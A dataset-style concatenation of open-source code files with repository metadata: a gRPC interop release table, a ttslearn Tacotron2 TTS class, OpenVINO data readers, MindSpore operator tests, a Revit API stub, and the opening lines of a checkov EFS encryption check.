ReleaseInfo(
runtimes=["python"], testcases_file="python__master"
),
),
(
"v1.47.1",
ReleaseInfo(
runtimes=["python"], testcases_file="python__master"
),
),
(
"v1.48.3",
ReleaseInfo(
runtimes=["python"], testcases_file="python__master"
),
),
(
"v1.49.1",
ReleaseInfo(
runtimes=["python"], testcases_file="python__master"
),
),
(
"v1.52.0",
ReleaseInfo(
runtimes=["python"], testcases_file="python__master"
),
),
(
"v1.53.0",
ReleaseInfo(
runtimes=["python"], testcases_file="python__master"
),
),
(
"v1.54.0",
ReleaseInfo(
runtimes=["python"], testcases_file="python__master"
),
),
(
"v1.55.0",
ReleaseInfo(
runtimes=["python"], testcases_file="python__master"
),
),
(
"v1.56.0",
ReleaseInfo(
runtimes=["python"], testcases_file="python__master"
),
),
(
"v1.57.0",
ReleaseInfo(
runtimes=["python"], testcases_file="python__master"
),
),
]
),
"node": OrderedDict(
[
("v1.0.1", ReleaseInfo(testcases_file="node__v1.0.1")),
("v1.1.4", ReleaseInfo(testcases_file="node__v1.1.4")),
("v1.2.5", ReleaseInfo(testcases_file="node__v1.1.4")),
("v1.3.9", ReleaseInfo(testcases_file="node__v1.1.4")),
("v1.4.2", ReleaseInfo(testcases_file="node__v1.1.4")),
("v1.6.6", ReleaseInfo(testcases_file="node__v1.1.4")),
# TODO: https://github.com/grpc/grpc-node/issues/235.
# ('v1.7.2', ReleaseInfo()),
("v1.8.4", ReleaseInfo()),
("v1.9.1", ReleaseInfo()),
("v1.10.0", ReleaseInfo()),
("v1.11.3", ReleaseInfo()),
("v1.12.4", ReleaseInfo()),
]
),
"ruby": OrderedDict(
[
(
"v1.0.1",
ReleaseInfo(
patch=[
"tools/dockerfile/interoptest/grpc_interop_ruby/Dockerfile",
"tools/dockerfile/interoptest/grpc_interop_ruby/build_interop.sh",
],
testcases_file="ruby__v1.0.1",
),
),
("v1.1.4", ReleaseInfo(testcases_file="ruby__v1.1.4")),
("v1.2.5", ReleaseInfo(testcases_file="ruby__v1.1.4")),
("v1.3.9", ReleaseInfo(testcases_file="ruby__v1.1.4")),
("v1.4.2", ReleaseInfo(testcases_file="ruby__v1.1.4")),
("v1.6.6", ReleaseInfo(testcases_file="ruby__v1.1.4")),
("v1.7.2", ReleaseInfo(testcases_file="ruby__v1.1.4")),
("v1.8.0", ReleaseInfo(testcases_file="ruby__v1.1.4")),
("v1.9.1", ReleaseInfo(testcases_file="ruby__v1.1.4")),
("v1.10.1", ReleaseInfo(testcases_file="ruby__v1.1.4")),
("v1.11.1", ReleaseInfo(testcases_file="ruby__v1.1.4")),
("v1.12.0", ReleaseInfo(testcases_file="ruby__v1.1.4")),
("v1.13.0", ReleaseInfo(testcases_file="ruby__v1.1.4")),
("v1.14.1", ReleaseInfo(testcases_file="ruby__v1.1.4")),
("v1.15.0", ReleaseInfo(testcases_file="ruby__v1.1.4")),
("v1.16.0", ReleaseInfo(testcases_file="ruby__v1.1.4")),
("v1.17.1", ReleaseInfo(testcases_file="ruby__v1.1.4")),
(
"v1.18.0",
ReleaseInfo(
patch=[
"tools/dockerfile/interoptest/grpc_interop_ruby/build_interop.sh",
]
),
),
("v1.19.0", ReleaseInfo()),
("v1.20.0", ReleaseInfo()),
("v1.21.4", ReleaseInfo()),
("v1.22.0", ReleaseInfo()),
("v1.22.1", ReleaseInfo()),
("v1.23.0", ReleaseInfo()),
("v1.24.0", ReleaseInfo()),
("v1.25.0", ReleaseInfo()),
# TODO: https://github.com/grpc/grpc/issues/18262.
# If you are not encountering the error in above issue
# go ahead and upload the docker image for new releases.
("v1.26.0", ReleaseInfo()),
("v1.27.3", ReleaseInfo()),
("v1.30.0", ReleaseInfo()),
("v1.31.1", ReleaseInfo()),
("v1.32.0", ReleaseInfo()),
("v1.33.2", ReleaseInfo()),
("v1.34.0", ReleaseInfo()),
("v1.35.0", ReleaseInfo()),
("v1.36.3", ReleaseInfo()),
("v1.37.0", ReleaseInfo()),
("v1.38.0", ReleaseInfo()),
("v1.39.0", ReleaseInfo()),
("v1.41.1", ReleaseInfo()),
("v1.42.0", ReleaseInfo()),
("v1.43.0", ReleaseInfo()),
("v1.44.0", ReleaseInfo()),
("v1.46.2", ReleaseInfo()),
("v1.47.1", ReleaseInfo()),
("v1.48.3", ReleaseInfo()),
("v1.49.1", ReleaseInfo()),
("v1.52.0", ReleaseInfo()),
("v1.53.0", ReleaseInfo()),
("v1.54.0", ReleaseInfo()),
("v1.55.0", ReleaseInfo()),
("v1.56.0", ReleaseInfo()),
("v1.57.0", ReleaseInfo()),
]
),
"php": OrderedDict(
[
("v1.0.1", ReleaseInfo(testcases_file="php__v1.0.1")),
("v1.1.4", ReleaseInfo(testcases_file="php__v1.0.1")),
("v1.2.5", ReleaseInfo(testcases_file="php__v1.0.1")),
("v1.3.9", ReleaseInfo(testcases_file="php__v1.0.1")),
("v1.4.2", ReleaseInfo(testcases_file="php__v1.0.1")),
("v1.6.6", ReleaseInfo(testcases_file="php__v1.0.1")),
("v1.7.2", ReleaseInfo(testcases_file="php__v1.0.1")),
("v1.8.0", ReleaseInfo(testcases_file="php__v1.0.1")),
("v1.9.1", ReleaseInfo(testcases_file="php__v1.0.1")),
("v1.10.1", ReleaseInfo(testcases_file="php__v1.0.1")),
("v1.11.1", ReleaseInfo(testcases_file="php__v1.0.1")),
("v1.12.0", ReleaseInfo(testcases_file="php__v1.0.1")),
("v1.13.0", ReleaseInfo(testcases_file="php__v1.0.1")),
("v1.14.1", ReleaseInfo(testcases_file="php__v1.0.1")),
("v1.15.0", ReleaseInfo(testcases_file="php__v1.0.1")),
("v1.16.0", ReleaseInfo(testcases_file="php__v1.0.1")),
("v1.17.1", ReleaseInfo(testcases_file="php__v1.0.1")),
("v1.18.0", ReleaseInfo()),
# v1.19 and v1.20 were deliberately omitted here because of an issue.
# See https://github.com/grpc/grpc/issues/18264
("v1.21.4", ReleaseInfo()),
("v1.22.0", ReleaseInfo()),
("v1.22.1", ReleaseInfo()),
("v1.23.0", ReleaseInfo()),
("v1.24.0", ReleaseInfo()),
("v1.25.0", ReleaseInfo()),
("v1.26.0", ReleaseInfo()),
("v1.27.3", ReleaseInfo()),
("v1.30.0", ReleaseInfo()),
("v1.31.1", ReleaseInfo()),
("v1.32.0", ReleaseInfo()),
("v1.33.2", ReleaseInfo()),
("v1.34.0", ReleaseInfo()),
("v1.35.0", ReleaseInfo()),
("v1.36.3", ReleaseInfo()),
("v1.37.0", ReleaseInfo()),
("v1.38.0", ReleaseInfo()),
("v1.39.0", ReleaseInfo()),
("v1.41.1", ReleaseInfo()),
("v1.42.0", ReleaseInfo()),
("v1.43.0", ReleaseInfo()),
("v1.44.0", ReleaseInfo()),
("v1.46.2", ReleaseInfo()),
("v1.47.1", ReleaseInfo()),
("v1.48.3", ReleaseInfo()),
("v1.49.1", ReleaseInfo()),
("v1.52.0", ReleaseInfo()),
("v1.53.0", ReleaseInfo()),
("v1.54.0", ReleaseInfo()),
("v1.55.0", ReleaseInfo()),
("v1.56.0", ReleaseInfo()),
("v1.57.0", ReleaseInfo()),
]
),
"csharp": OrderedDict(
[
(
"v1.0.1",
ReleaseInfo(
patch=[
"tools/dockerfile/interoptest/grpc_interop_csharp/Dockerfile",
"tools/dockerfile/interoptest/grpc_interop_csharpcoreclr/Dockerfile",
],
testcases_file="csharp__v1.1.4",
),
),
("v1.1.4", ReleaseInfo(testcases_file="csharp__v1.1.4")),
("v1.2.5", ReleaseInfo(testcases_file="csharp__v1.1.4")),
("v1.3.9", ReleaseInfo(testcases_file="csharp__v1.3.9")),
("v1.4.2", ReleaseInfo(testcases_file="csharp__v1.3.9")),
("v1.6.6", ReleaseInfo(testcases_file="csharp__v1.3.9")),
("v1.7.2", ReleaseInfo(testcases_file="csharp__v1.3.9")),
("v1.8.0", ReleaseInfo(testcases_file="csharp__v1.3.9")),
("v1.9.1", ReleaseInfo(testcases_file="csharp__v1.3.9")),
("v1.10.1", ReleaseInfo(testcases_file="csharp__v1.3.9")),
("v1.11.1", ReleaseInfo(testcases_file="csharp__v1.3.9")),
("v1.12.0", ReleaseInfo(testcases_file="csharp__v1.3.9")),
("v1.13.0", ReleaseInfo(testcases_file="csharp__v1.3.9")),
("v1.14.1", ReleaseInfo(testcases_file="csharp__v1.3.9")),
("v1.15.0", ReleaseInfo(testcases_file="csharp__v1.3.9")),
("v1.16.0", ReleaseInfo(testcases_file="csharp__v1.3.9")),
("v1.17.1", ReleaseInfo(testcases_file="csharp__v1.3.9")),
("v1.18.0", ReleaseInfo(testcases_file="csharp__v1.18.0")),
("v1.19.0", ReleaseInfo(testcases_file="csharp__v1.18.0")),
("v1.20.0", ReleaseInfo(testcases_file="csharp__v1.20.0")),
("v1.20.0", ReleaseInfo(testcases_file="csharp__v1.20.0")),
("v1.21.4", ReleaseInfo(testcases_file="csharp__v1.20.0")),
("v1.22.0", ReleaseInfo(testcases_file="csharp__v1.20.0")),
("v1.22.1", ReleaseInfo(testcases_file="csharp__v1.20.0")),
("v1.23.0", ReleaseInfo(testcases_file="csharp__v1.20.0")),
("v1.24.0", ReleaseInfo(testcases_file="csharp__v1.20.0")),
("v1.25.0", ReleaseInfo(testcases_file="csharp__v1.20.0")),
("v1.26.0", ReleaseInfo(testcases_file="csharp__v1.20.0")),
("v1.27.3", ReleaseInfo(testcases_file="csharp__v1.20.0")),
("v1.30.0", ReleaseInfo(testcases_file="csharp__v1.20.0")),
("v1.31.1", ReleaseInfo(testcases_file="csharp__v1.20.0")),
("v1.32.0", ReleaseInfo(testcases_file="csharp__v1.20.0")),
("v1.33.2", ReleaseInfo(testcases_file="csharp__v1.20.0")),
("v1.34.0", ReleaseInfo(testcases_file="csharp__v1.20.0")),
("v1.35.0", ReleaseInfo(testcases_file="csharp__v1.20.0")),
("v1.36.3", ReleaseInfo(testcases_file="csharp__v1.20.0")),
("v1.37.0", ReleaseInfo(testcases_file="csharp__v1.20.0")),
("v1.38.1", ReleaseInfo(testcases_file="csharp__v1.20.0")),
("v1.39.1", ReleaseInfo(testcases_file="csharp__v1.20.0")),
("v1.41.1", ReleaseInfo(testcases_file="csharp__v1.20.0")),
("v1.42.0", ReleaseInfo(testcases_file="csharp__v1.20.0")),
("v1.43.0", ReleaseInfo()),
("v1.44.0", ReleaseInfo()),
("v1.46.2", ReleaseInfo()),
]
),
}
|
cb2253128e9c5ddedd8f1c01ca7245fd6b5c965c
|
beaa8e9d6ec16c2ffe8a7d9f72fd6eea904083bb
|
/ttslearn/tacotron/tts.py
|
948de592ada3aba5f00e69612c5e8020857f8f0c
|
[
"MIT"
] |
permissive
|
r9y9/ttslearn
|
553f7a92c6160d4d379459bbfd5bf5924a4a4a70
|
a970d4ee8aa1d9ce1603d8d3c06d5d67f26b639e
|
refs/heads/master
| 2023-04-09T19:32:28.797819
| 2023-03-07T11:55:48
| 2023-03-07T11:55:48
| 378,789,439
| 220
| 43
|
MIT
| 2023-03-07T11:55:50
| 2021-06-21T02:54:03
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 5,852
|
py
|
tts.py
|
import json
from pathlib import Path
import numpy as np
import pyopenjtalk
import torch
from hydra.utils import instantiate
from omegaconf import OmegaConf
from tqdm import tqdm
from ttslearn.dsp import inv_mulaw_quantize, logmelspectrogram_to_audio
from ttslearn.pretrained import retrieve_pretrained_model
from ttslearn.tacotron.frontend.openjtalk import pp_symbols, text_to_sequence
from ttslearn.util import StandardScaler
class Tacotron2TTS(object):
"""Tacotron 2 based text-to-speech
Args:
model_dir (str): model directory. A pre-trained model (ID: ``tacotron2``)
is used if None.
device (str): cpu or cuda.
Examples:
>>> from ttslearn.tacotron import Tacotron2TTS
>>> engine = Tacotron2TTS()
>>> wav, sr = engine.tts("一貫学習にチャレンジしましょう!")
"""
def __init__(self, model_dir=None, device="cpu"):
self.device = device
if model_dir is None:
model_dir = retrieve_pretrained_model("tacotron2")
if isinstance(model_dir, str):
model_dir = Path(model_dir)
# search for config.yaml
if (model_dir / "config.yaml").exists():
config = OmegaConf.load(model_dir / "config.yaml")
self.sample_rate = config.sample_rate
self.mu = config.mu
else:
self.sample_rate = 16000
self.mu = 255
# 音響モデル
self.acoustic_config = OmegaConf.load(model_dir / "acoustic_model.yaml")
self.acoustic_model = instantiate(self.acoustic_config.netG).to(device)
checkpoint = torch.load(
model_dir / "acoustic_model.pth",
map_location=device,
)
self.acoustic_model.load_state_dict(checkpoint["state_dict"])
self.acoustic_out_scaler = StandardScaler(
np.load(model_dir / "out_tacotron_scaler_mean.npy"),
np.load(model_dir / "out_tacotron_scaler_var.npy"),
np.load(model_dir / "out_tacotron_scaler_scale.npy"),
)
self.acoustic_model.eval()
# WaveNet vocoder
self.wavenet_config = OmegaConf.load(model_dir / "wavenet_model.yaml")
self.wavenet_model = instantiate(self.wavenet_config.netG).to(device)
checkpoint = torch.load(
model_dir / "wavenet_model.pth",
map_location=device,
)
self.wavenet_model.load_state_dict(checkpoint["state_dict"])
self.wavenet_model.eval()
self.wavenet_model.remove_weight_norm_()
def __repr__(self):
acoustic_str = json.dumps(
OmegaConf.to_container(self.acoustic_config["netG"]),
sort_keys=False,
indent=4,
)
wavenet_str = json.dumps(
OmegaConf.to_container(self.wavenet_config["netG"]),
sort_keys=False,
indent=4,
)
return f"""Tacotron2 TTS (sampling rate: {self.sample_rate})
Acoustic model: {acoustic_str}
Vocoder model: {wavenet_str}
"""
def set_device(self, device):
"""Set device for the TTS models
Args:
device (str): cpu or cuda.
"""
self.device = device
self.acoustic_model.to(device)
self.wavenet_model.to(device)
@torch.no_grad()
def tts(self, text, griffin_lim=False, tqdm=tqdm):
"""Run TTS
Args:
text (str): Input text
griffin_lim (bool, optional): Use Griffin-Lim algorithm or not. Defaults to False.
tqdm (object, optional): tqdm object. Defaults to None.
Returns:
tuple: audio array (np.int16) and sampling rate (int)
"""
# OpenJTalkを用いて言語特徴量の抽出
contexts = pyopenjtalk.extract_fullcontext(text)
# 韻律記号付き音素列に変換
in_feats = text_to_sequence(pp_symbols(contexts))
in_feats = torch.tensor(in_feats, dtype=torch.long).to(self.device)
# (T, C)
_, out_feats, _, _ = self.acoustic_model.inference(in_feats)
if griffin_lim:
# Griffin-Lim のアルゴリズムに基づく音声波形合成
out_feats = out_feats.cpu().data.numpy()
# 正規化の逆変換
logmel = self.acoustic_out_scaler.inverse_transform(out_feats)
gen_wav = logmelspectrogram_to_audio(logmel, self.sample_rate)
else:
# (B, T, C) -> (B, C, T)
c = out_feats.view(1, -1, out_feats.size(-1)).transpose(1, 2)
# 音声波形の長さを計算
upsample_scale = np.prod(self.wavenet_model.upsample_scales)
T = (
c.shape[-1] - self.wavenet_model.aux_context_window * 2
) * upsample_scale
# WaveNet ボコーダによる音声波形の生成
# NOTE: 計算に時間を要するため、tqdm によるプログレスバーを利用します
gen_wav = self.wavenet_model.inference(c, T, tqdm)
# One-hot ベクトルから1次元の信号に変換
gen_wav = gen_wav.max(1)[1].float().cpu().numpy().reshape(-1)
# Mu-law 量子化の逆変換
# NOTE: muは出力チャンネル数-1だと仮定
gen_wav = inv_mulaw_quantize(gen_wav, self.wavenet_model.out_channels - 1)
return self.post_process(gen_wav), self.sample_rate
def post_process(self, wav):
wav = np.clip(wav, -1.0, 1.0)
wav = (wav * 32767.0).astype(np.int16)
return wav
def randomize_tts_engine_(engine: Tacotron2TTS) -> Tacotron2TTS:
# アテンションのパラメータの一部を強制的に乱数で初期化することで、学習済みモデルを破壊する
torch.nn.init.normal_(engine.acoustic_model.decoder.attention.mlp_dec.weight.data)
return engine
|
1c8b6d2052d5e7e63e66088e0831c9f39547f10a
|
4091caecbc727e6d6ae0d827afce11c5979a84fd
|
/tools/accuracy_checker/openvino/tools/accuracy_checker/data_readers/binary_data_readers.py
|
5454bd8cd359f9b5dda50b0a6018235edc772022
|
[
"Apache-2.0"
] |
permissive
|
openvinotoolkit/open_model_zoo
|
fdb03dd40bfccb854e4ed4f7b9beaa90596963cd
|
7929adbe91e9cfe8dc5dc1daad5ae7392f9719a0
|
refs/heads/master
| 2023-08-18T18:03:47.254427
| 2023-08-18T10:54:31
| 2023-08-18T10:54:31
| 153,097,694
| 1,712
| 730
|
Apache-2.0
| 2023-09-11T11:31:20
| 2018-10-15T10:55:02
|
Python
|
UTF-8
|
Python
| false
| false
| 2,503
|
py
|
binary_data_readers.py
|
"""
Copyright (c) 2018-2023 Intel Corporation
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import cv2
import numpy as np
from .data_reader import BaseReader, DataRepresentation
from ..utils import read_pickle, UnsupportedPackage
try:
import lmdb
except ImportError as import_error:
lmdb = UnsupportedPackage("lmdb", import_error.msg)
class PickleReader(BaseReader):
__provider__ = 'pickle_reader'
def read(self, data_id):
data_path = self.data_source / data_id if self.data_source is not None else data_id
data = read_pickle(data_path)
if isinstance(data, list) and len(data) == 2 and isinstance(data[1], dict):
return data
return data, {}
def read_item(self, data_id):
data = DataRepresentation(*self.read_dispatcher(data_id), identifier=data_id)
if self.multi_infer:
data.metadata['multi_infer'] = self.multi_infer
if self.data_layout:
data.metadata['data_layout'] = self.data_layout
return data
class ByteFileReader(BaseReader):
__provider__ = 'byte_reader'
def read(self, data_id):
data_path = self.data_source / data_id if self.data_source is not None else data_id
with open(data_path, 'rb') as f:
return np.array(f.read())
class LMDBReader(BaseReader):
__provider__ = 'lmdb_reader'
def configure(self):
super().configure()
if isinstance(lmdb, UnsupportedPackage):
lmdb.raise_error(self.__provider__)
self.database = lmdb.open(bytes(self.data_source), readonly=True, lock=False)
def read(self, data_id):
with self.database.begin(write=False) as txn:
img_key = f'image-{data_id:09d}'.encode()
image_bytes = txn.get(img_key)
img = cv2.imdecode(np.frombuffer(image_bytes, np.uint8), cv2.IMREAD_UNCHANGED)
if len(img.shape) < 3:
img = np.stack((img,) * 3, axis=-1)
assert img.shape[-1] == 3
return img
|
c160cd6500d13d7c323710be630dcbe2de41f6de
|
ffdc77394c5b5532b243cf3c33bd584cbdc65cb7
|
/tests/st/ops/dynamic_sequence/test_dynamic_list_append.py
|
fc34d934abaec7d244c44ed102a73a3810704514
|
[
"Apache-2.0",
"LicenseRef-scancode-proprietary-license",
"MPL-1.0",
"OpenSSL",
"LGPL-3.0-only",
"LicenseRef-scancode-warranty-disclaimer",
"BSD-3-Clause-Open-MPI",
"MIT",
"MPL-2.0-no-copyleft-exception",
"NTP",
"BSD-3-Clause",
"GPL-1.0-or-later",
"0BSD",
"MPL-2.0",
"LicenseRef-scancode-free-unknown",
"AGPL-3.0-only",
"Libpng",
"MPL-1.1",
"IJG",
"GPL-2.0-only",
"BSL-1.0",
"Zlib",
"LicenseRef-scancode-public-domain",
"LicenseRef-scancode-python-cwi",
"BSD-2-Clause",
"LicenseRef-scancode-gary-s-brown",
"LGPL-2.1-only",
"LicenseRef-scancode-other-permissive",
"Python-2.0",
"LicenseRef-scancode-mit-nagy",
"LicenseRef-scancode-other-copyleft",
"LicenseRef-scancode-unknown-license-reference",
"Unlicense"
] |
permissive
|
mindspore-ai/mindspore
|
ca7d5bb51a3451c2705ff2e583a740589d80393b
|
54acb15d435533c815ee1bd9f6dc0b56b4d4cf83
|
refs/heads/master
| 2023-07-29T09:17:11.051569
| 2023-07-17T13:14:15
| 2023-07-17T13:14:15
| 239,714,835
| 4,178
| 768
|
Apache-2.0
| 2023-07-26T22:31:11
| 2020-02-11T08:43:48
|
C++
|
UTF-8
|
Python
| false
| false
| 3,780
|
py
|
test_dynamic_list_append.py
|
# Copyright 2023 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
import pytest
import numpy as np
from mindspore import context, Tensor
from mindspore.common import mutable
from mindspore.nn import Cell
from mindspore.ops.composite import GradOperation
from mindspore._extends.parse.standard_method import list_append
from sequence_help import context_prepare
context.set_context(mode=context.GRAPH_MODE)
context_prepare()
@pytest.mark.level0
@pytest.mark.platform_x86_gpu_training
@pytest.mark.platform_arm_ascend_training
@pytest.mark.platform_x86_ascend_training
@pytest.mark.env_onecard
def test_list_append1():
"""
Feature: test sequence getitem op
Description: setitem operation on tuple type
Expectation: the behavior is matched to python style
"""
class Net(Cell):
def construct(self, x, y):
return list_append(x, y)
net_ms = Net()
input_x = mutable([2], True)
input_y = mutable(3)
res = net_ms(input_x, input_y)
expect = [2, 3]
assert res == expect
@pytest.mark.level1
@pytest.mark.platform_x86_gpu_training
@pytest.mark.platform_arm_ascend_training
@pytest.mark.platform_x86_ascend_training
@pytest.mark.env_onecard
def test_list_append2():
"""
Feature: test sequence getitem op
Description: setitem operation on tuple type
Expectation: the behavior is matched to python style
"""
class Net(Cell):
def construct(self, x, y):
return list_append(x, y)
net_ms = Net()
input_x = mutable([Tensor(2)], True)
input_y = Tensor(3)
res = net_ms(input_x, input_y)
expect = [Tensor(2), Tensor(3)]
for i in range(2):
assert np.all(res[i].asnumpy() == expect[i].asnumpy())
@pytest.mark.level1
@pytest.mark.platform_x86_gpu_training
@pytest.mark.platform_arm_ascend_training
@pytest.mark.platform_x86_ascend_training
@pytest.mark.env_onecard
def test_list_append3():
"""
Feature: test sequence getitem op
Description: setitem operation on tuple type
Expectation: the behavior is matched to python style
"""
class Net(Cell):
def construct(self, x, y):
return list_append(x, y)
net_ms = Net()
input_x = mutable([Tensor([[2, 3], [4, 5]])], True)
input_y = Tensor([[2, 3], [4, 5]])
res = net_ms(input_x, input_y)
expect = [Tensor([[2, 3], [4, 5]]), Tensor([[2, 3], [4, 5]])]
for i in range(2):
assert np.all(res[i].asnumpy() == expect[i].asnumpy())
@pytest.mark.level0
@pytest.mark.platform_x86_gpu_training
@pytest.mark.platform_arm_ascend_training
@pytest.mark.platform_x86_ascend_training
@pytest.mark.env_onecard
def test_list_append_grad():
"""
Feature: test sequence getitem grad op
Description: setitem operation on tuple type
Expectation: the behavior is matched to python style
"""
class Net(Cell):
def construct(self, x, y):
return list_append(x, y)
net_ms = Net()
seq = mutable((1, 2, 3, 4, 5, 6), True)
value = 1
dout = mutable((1, 2, 3, 4, 5, 6, 1), True)
grad_func = GradOperation(get_all=True, sens_param=True)(net_ms)
print("grad out1 = ", grad_func(seq, value, dout))
|
1b8adbb2cb61d6b5d74f9e25e6e9e36293c38377
|
afbae26b958b5ef20548402a65002dcc8e55b66a
|
/release/stubs.min/Autodesk/Revit/DB/__init___parts/ReferenceWithContext.py
|
649c44f14c9b2e4f36030bc1d92a1072824385c4
|
[
"MIT"
] |
permissive
|
gtalarico/ironpython-stubs
|
d875cb8932c7644f807dc6fde9dd513d159e4f5c
|
c7f6a6cb197e3949e40a4880a0b2a44e72d0a940
|
refs/heads/master
| 2023-07-12T01:43:47.295560
| 2022-05-23T18:12:06
| 2022-05-23T18:12:06
| 95,340,553
| 235
| 88
|
NOASSERTION
| 2023-07-05T06:36:28
| 2017-06-25T05:30:46
|
Python
|
UTF-8
|
Python
| false
| false
| 2,171
|
py
|
ReferenceWithContext.py
|
class ReferenceWithContext(object,IDisposable):
""" An object including a reference to a geometric object and related context,as instance transform etc. """
def Dispose(self):
""" Dispose(self: ReferenceWithContext) """
pass
def GetInstanceTransform(self):
"""
GetInstanceTransform(self: ReferenceWithContext) -> Transform
Gets the transform of the instance.
Returns: The transform of an instance when the reference is returned by
FindReferencesWithContextByDirection(XYZ,XYZ,View3D) or
ReferenceIntersector.Find(XYZ,XYZ).
"""
pass
def GetReference(self):
"""
GetReference(self: ReferenceWithContext) -> Reference
Gets the reference of the geometric object.
Returns: The reference of a geometric object when it is returned by
FindReferencesWithContextByDirection(XYZ,XYZ,View3D) or
ReferenceIntersector.Find(XYZ,XYZ).
"""
pass
def ReleaseUnmanagedResources(self,*args):
""" ReleaseUnmanagedResources(self: ReferenceWithContext,disposing: bool) """
pass
def __enter__(self,*args):
""" __enter__(self: IDisposable) -> object """
pass
def __exit__(self,*args):
""" __exit__(self: IDisposable,exc_type: object,exc_value: object,exc_back: object) """
pass
def __init__(self,*args):
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
def __repr__(self,*args):
""" __repr__(self: object) -> str """
pass
IsValidObject=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Specifies whether the .NET object represents a valid Revit entity.
Get: IsValidObject(self: ReferenceWithContext) -> bool
"""
Proximity=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""The proximity value to the ray's origin when the reference is returned by FindReferencesWithContextByDirection(XYZ,XYZ,View3D) or ReferenceIntersector.Find(XYZ,XYZ).
Get: Proximity(self: ReferenceWithContext) -> float
"""
|
e7ec7870c1af708cf7f6b12f35923afdab58d2c5
|
ffdc77394c5b5532b243cf3c33bd584cbdc65cb7
|
/tests/st/ops/gpu/test_searchsorted_op.py
|
e58a9de63a46ffcaf2dff6f5c6f58e62e600938c
|
[
"Apache-2.0",
"LicenseRef-scancode-proprietary-license",
"MPL-1.0",
"OpenSSL",
"LGPL-3.0-only",
"LicenseRef-scancode-warranty-disclaimer",
"BSD-3-Clause-Open-MPI",
"MIT",
"MPL-2.0-no-copyleft-exception",
"NTP",
"BSD-3-Clause",
"GPL-1.0-or-later",
"0BSD",
"MPL-2.0",
"LicenseRef-scancode-free-unknown",
"AGPL-3.0-only",
"Libpng",
"MPL-1.1",
"IJG",
"GPL-2.0-only",
"BSL-1.0",
"Zlib",
"LicenseRef-scancode-public-domain",
"LicenseRef-scancode-python-cwi",
"BSD-2-Clause",
"LicenseRef-scancode-gary-s-brown",
"LGPL-2.1-only",
"LicenseRef-scancode-other-permissive",
"Python-2.0",
"LicenseRef-scancode-mit-nagy",
"LicenseRef-scancode-other-copyleft",
"LicenseRef-scancode-unknown-license-reference",
"Unlicense"
] |
permissive
|
mindspore-ai/mindspore
|
ca7d5bb51a3451c2705ff2e583a740589d80393b
|
54acb15d435533c815ee1bd9f6dc0b56b4d4cf83
|
refs/heads/master
| 2023-07-29T09:17:11.051569
| 2023-07-17T13:14:15
| 2023-07-17T13:14:15
| 239,714,835
| 4,178
| 768
|
Apache-2.0
| 2023-07-26T22:31:11
| 2020-02-11T08:43:48
|
C++
|
UTF-8
|
Python
| false
| false
| 2,048
|
py
|
test_searchsorted_op.py
|
import numpy as np
import pytest
import mindspore
import mindspore.context as context
import mindspore.nn as nn
from mindspore import Tensor
from mindspore.ops import operations as P
class SearchSortedNet(nn.Cell):
def __init__(self, out_int32=mindspore.int32, right=False):
super(SearchSortedNet, self).__init__()
self.searchsorted = P.SearchSorted(dtype=out_int32, right=right)
def construct(self, sequence, values):
return self.searchsorted(sequence, values)
def search_sorted(loss):
context.set_context(mode=context.GRAPH_MODE, device_target='GPU')
input1 = Tensor(np.array([[0, 1, 3, 5, 7], [2, 4, 6, 8, 10]]), mindspore.float32)
input2 = Tensor(np.array([[3, 6, 9], [3, 6, 9]]), mindspore.float32)
net = SearchSortedNet(out_int32=mindspore.int32, right=False)
expect = np.array([[2, 4, 5], [1, 2, 4]], dtype=np.int32)
output = net(input1, input2)
assert np.allclose(output.asnumpy(), expect, loss, loss)
def search_sorted_pynative(loss):
context.set_context(mode=context.PYNATIVE_MODE, device_target='GPU')
input1 = Tensor(np.array([[0, 1, 3, 5, 7], [2, 4, 6, 8, 10]]), mindspore.float32)
input2 = Tensor(np.array([[3, 6, 9], [3, 6, 9]]), mindspore.float32)
net = SearchSortedNet(out_int32=mindspore.int32, right=False)
expect = np.array([[2, 4, 5], [1, 2, 4]], dtype=np.int32)
output = net(input1, input2)
assert np.allclose(output.asnumpy(), expect, loss, loss)
@pytest.mark.level1
@pytest.mark.platform_x86_gpu_training
@pytest.mark.env_onecard
def test_search_sorted_graph_int32():
"""
Feature: ALL To ALL
Description: test cases for SearchSorted
Expectation: the result match to pytorch
"""
search_sorted(loss=1.0e-4)
@pytest.mark.level0
@pytest.mark.platform_x86_gpu_training
@pytest.mark.env_onecard
def test_search_sorted_pynative_int32():
"""
Feature: ALL To ALL
Description: test cases for SearchSorted
Expectation: the result match to pytorch
"""
search_sorted_pynative(loss=1.0e-5)
|
b306dcf7fd9a0f53ecef01dada87ac44a4b9b182
|
45e376ae66b78b17788b1d3575b334b2cb1d0b1c
|
/checkov/cloudformation/checks/resource/aws/EFSEncryptionEnabled.py
|
4677b0ca10059e136780c69652317c9866a1dbf3
|
[
"Apache-2.0"
] |
permissive
|
bridgecrewio/checkov
|
aeb8febed2ed90e61d5755f8f9d80b125362644d
|
e64cbd27ffb6f09c2c9f081b45b7a821a3aa1a4d
|
refs/heads/main
| 2023-08-31T06:57:21.990147
| 2023-08-30T23:01:47
| 2023-08-30T23:01:47
| 224,386,599
| 5,929
| 1,056
|
Apache-2.0
| 2023-09-14T20:10:23
| 2019-11-27T08:55:14
|
Python
|
UTF-8
|
Python
| false
| false
| 613
|
py
|
EFSEncryptionEnabled.py
|
from checkov.cloudformation.checks.resource.base_resource_value_check import BaseResourceValueCheck
from checkov.common.models.enums import CheckCategories
class EFSEncryption(BaseResourceValueCheck):
def __init__(self):
name = "Ensure EFS is securely encrypted"
